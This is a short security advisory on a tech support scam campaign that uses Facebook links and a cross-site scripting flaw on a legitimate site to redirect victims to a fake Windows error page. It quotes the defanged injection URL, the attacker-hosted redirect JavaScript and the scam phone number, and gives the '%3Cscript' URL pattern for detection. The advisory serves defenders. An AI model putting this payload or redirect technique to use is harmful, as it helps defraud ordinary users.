Researchers at Malwarebytes Labs reported that threat actors have recently been detected using links from Facebook to entice individuals to click through to a series of browser redirections, ultimately ending up on a tech support scam website that simulates a Windows error screen. Victims who end up on the error screen are asked to call a toll-free number that purports to be Microsoft Tech Support. The threat actors pretend to be associated with Microsoft and attempt to scam money from victims to remotely access the victim’s computer to “fix” the supposed issue. One of the interesting aspects of this attack was the fact that the attackers made use of a legitimate website that has a cross-site scripting (XSS) vulnerability that allowed JavaScript to be injected and use the site as an open redirect to another URL. The URL used was the following:
rpp[.]pe/buscar?q=hoy%3Cscript%20src=%27https://buddhosi[.]com/210c/
?zg1lx5u0.js%27%3E%3C/script%3E&fbclid={removed}
The JavaScript that was downloaded from buddhosi[.]com was the following:
top.location.replace(‘https://BernetteJudeTews[.]club/home/anette/?
nr=855-472-1832&’+window.location.search.substring(1));
Analyst Notes
Network defenders for corporate IT environments can detect attacks that use XSS and open redirects by requiring all web requests to go through an HTTP proxy server. Data collected from endpoints that include URLs for remote connections can also be used for remote workers who might not always use corporate network VPNs for all network traffic. Look for warning signs of XSS such as %3Cscript or more encoded versions of that in URLs. Companies should also ensure that their websites do not contain vulnerabilities that would allow attackers to abuse them for XSS or open redirects. This type of tech support scam is more likely to affect individuals, rather than business users, so it is also helpful to inform relatives and friends about this type of scam and that they should never give remote access to their computer to anyone who calls on the phone or puts a phone number on their screen.
For more details, please read Malwarebytes blog: https://blog.malwarebytes.com/cybercrime/2020/10/xss-to-tss-tech-support-scam-campaign/